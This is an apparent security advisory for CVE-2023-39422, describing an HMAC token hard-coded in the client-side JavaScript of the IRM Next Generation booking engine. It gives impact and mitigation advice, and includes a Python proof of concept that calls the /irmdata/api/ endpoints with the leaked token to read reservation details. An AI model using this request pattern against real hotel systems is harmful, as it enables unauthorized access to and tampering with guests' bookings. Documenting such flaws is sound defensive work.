CVE-2023-39422: IRM Next Generation Booking Engine's Client-Side HMAC Token Exposure

An authentication vulnerability, termed CVE-2023-39422, has been discovered within the IRM Next Generation booking engine, which exposes critical HMAC tokens through client-side JavaScript files. Due to this exposure, the additional safety mechanism put in place is rendered ineffective, opening the platform up to potential security threats.

Background

The IRM Next Generation booking engine is a prominent application that has made its mark in the hotel and aviation industry. Trusted by numerous establishments, it offers a range of features such as reservation management, room and inventory management, and dynamic pricing.

Vulnerability Details

The vulnerability pertains to the /irmdata/api/ endpoints, which are responsible for handling sensitive information. Although the application enables HMAC token-based authentication for these critical endpoints, poor implementation has caused these tokens to be exposed via JavaScript files loaded on the client-side.

A simple method to reproduce this issue is by opening up the browser's developer tools (Ctrl+Shift+I) and navigating the loaded JavaScript files for the booking application. It is possible to locate the HMAC token hard-coded within one of these files, as shown below:

var bookingApi = {
  baseUrl: "/irmdata/api/",
  hmacToken: "d2a61e28ea714c579b425ed9344f9c56",  // Exposed HMAC token
};

// Example request using the HMAC token for authentication
$.ajaxPrefilter(function(options, originalOptions, jqXHR) {
  var requestUrl = url.parse(options.url);
  var requestData = {
    // Include HMAC token in the request header
    headers: { "IRM-HMAC-Token": bookingApi.hmacToken },
  };

  // Attach the authentication data to the AJAX request
  $.extend(true, options, requestData);
});

Exploit Details

With the exposed HMAC token in hand, a malicious user can potentially exploit the issue by sending API requests with the leaked token, causing unauthorized access to sensitive information and operations.

Below is a Python sample that demonstrates how to exploit the vulnerability

import requests

exposed_hmac_token = "d2a61e28ea714c579b425ed9344f9c56"
api_endpoint = "https://www.example.com/irmdata/api/";

headers = {"IRM-HMAC-Token": exposed_hmac_token}

# Example request to fetch sensitive information
response = requests.get(api_endpoint + "reservation-details", headers=headers)
print(response.json())

Impact

By exploiting this vulnerability, an attacker can perform unauthorized actions, such as accessing reservation details, modifying booking information, or even canceling reservations. As a result, there is a potential for reputation damage, financial loss, and possible lawsuits for the affected organizations.

Original References

The official CVE entry for this vulnerability can be found here. For further technical details, consult the vulnerability's NIST NVD page.

Move the HMAC token to server-side code so it is not exposed in client-side JavaScript files.

2. Implement proper access controls and authorization checks to limit the actions that can be performed with the HMAC token.
3. Regularly audit and review your application's security and identify vulnerabilities to ensure a secure environment.

IRM Next Generation's developers are encouraged to release a patch addressing this vulnerability as soon as possible, and maintain active communication with customers to keep them informed of the situation and any required actions.

Timeline

Published on: 09/07/2023 13:15:00 UTC
Last modified on: 09/12/2023 00:08:00 UTC